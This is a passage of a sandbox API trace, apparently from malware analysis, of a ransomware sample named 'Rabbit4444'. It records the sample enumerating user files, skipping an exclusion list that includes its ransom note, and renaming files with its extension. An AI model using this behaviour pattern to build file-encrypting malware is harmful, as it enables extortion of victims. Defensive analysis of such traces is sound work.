lstrlenW (lpString=".sys") returned 4 [0057.117] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.117] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_usagedetailslink.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.117] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.117] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14842801137) returned 1 [0057.117] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1350) returned 1 [0057.117] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.117] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0057.117] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0057.120] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0057.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.121] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.121] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.121] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.122] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.122] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14843230879) returned 1 [0057.122] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.122] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0057.122] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.122] CloseHandle (hObject=0x298) returned 1 [0057.122] CloseHandle (hObject=0x278) returned 1 [0057.122] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms.Rabbit4444") returned 206 [0057.122] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_usagedetailslink.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_usagedetailslink.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.123] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22a78c4d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x22a78c4d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233c02ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x520, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", cAlternateFileName="AA1B73~1.SET")) returned 1 [0057.123] lstrcmpiW (lpString1="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.123] lstrcmpiW (lpString1="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.123] lstrcmpiW (lpString1="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.123] lstrcmpiW (lpString1="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", lpString2=".") returned 1 [0057.123] lstrcmpiW (lpString1="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", lpString2="..") returned 1 [0057.123] lstrcmpiW (lpString1="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", lpString2="windows") returned -1 [0057.123] lstrcmpiW (lpString1="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.123] lstrcmpiW (lpString1="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.123] lstrcmpiW (lpString1="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", lpString2="boot") returned -1 [0057.123] lstrcmpiW (lpString1="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.123] lstrcmpiW (lpString1="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.123] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms") returned="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms" [0057.123] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.123] lstrlenW (lpString="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms") returned 70 [0057.123] lstrlenW (lpString="Rabbit4444") returned 10 [0057.123] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.123] lstrlenW (lpString=".dll") returned 4 [0057.123] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.124] lstrlenW (lpString=".lnk") returned 4 [0057.124] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.124] lstrlenW (lpString=".ini") returned 4 [0057.124] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.124] lstrlenW (lpString=".sys") returned 4 [0057.124] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.124] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datasense_configuresetlimitbutton.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.124] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.124] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14843469894) returned 1 [0057.124] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1312) returned 1 [0057.124] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.124] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0057.124] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.125] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.126] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.126] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.126] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.126] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.126] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.126] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.126] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.126] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.126] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14843723677) returned 1 [0057.127] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.127] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0057.127] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.127] CloseHandle (hObject=0x298) returned 1 [0057.127] CloseHandle (hObject=0x278) returned 1 [0057.127] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms.Rabbit4444") returned 198 [0057.127] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datasense_configuresetlimitbutton.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datasense_configuresetlimitbutton.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.128] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22e7ecde, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x22e7ecde, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", cAlternateFileName="AAF42F~1.SET")) returned 1 [0057.128] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.128] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.128] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.128] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", lpString2=".") returned 1 [0057.128] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", lpString2="..") returned 1 [0057.128] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", lpString2="windows") returned -1 [0057.128] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.128] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.128] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", lpString2="boot") returned -1 [0057.128] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.128] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.128] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms") returned="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms" [0057.128] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.128] lstrlenW (lpString="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms") returned 59 [0057.128] lstrlenW (lpString="Rabbit4444") returned 10 [0057.128] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.128] lstrlenW (lpString=".dll") returned 4 [0057.129] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.129] lstrlenW (lpString=".lnk") returned 4 [0057.129] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.129] lstrlenW (lpString=".ini") returned 4 [0057.129] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.129] lstrlenW (lpString=".sys") returned 4 [0057.129] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.129] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_countryregion.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.129] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.129] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14844003053) returned 1 [0057.129] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1251) returned 1 [0057.129] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.129] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0057.129] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.130] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.131] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.131] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.131] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.131] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.132] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.132] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.132] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.132] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14844244814) returned 1 [0057.132] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.132] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0057.132] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.132] CloseHandle (hObject=0x298) returned 1 [0057.132] CloseHandle (hObject=0x278) returned 1 [0057.132] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms.Rabbit4444") returned 187 [0057.132] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_countryregion.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_countryregion.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.133] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23369a6a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x23369a6a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", cAlternateFileName="AAC2C5~1.SET")) returned 1 [0057.133] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.133] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.133] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.133] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.133] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.133] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.133] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.133] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.133] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.133] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.134] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.134] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms") returned="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms" [0057.134] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.134] lstrlenW (lpString="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms") returned 73 [0057.134] lstrlenW (lpString="Rabbit4444") returned 10 [0057.134] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.134] lstrlenW (lpString=".dll") returned 4 [0057.134] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.134] lstrlenW (lpString=".lnk") returned 4 [0057.134] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.134] lstrlenW (lpString=".ini") returned 4 [0057.135] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.135] lstrlenW (lpString=".sys") returned 4 [0057.135] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.135] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_isautomaticdstadjustenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.135] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.135] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14844563400) returned 1 [0057.135] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1311) returned 1 [0057.135] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0057.135] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0057.135] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.136] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.137] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.137] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.137] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.137] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.137] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.138] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14844846881) returned 1 [0057.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0057.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0057.138] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.138] CloseHandle (hObject=0x298) returned 1 [0057.138] CloseHandle (hObject=0x278) returned 1 [0057.138] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms.Rabbit4444") returned 201 [0057.138] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_isautomaticdstadjustenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms.Rabbit4444" (normalized: 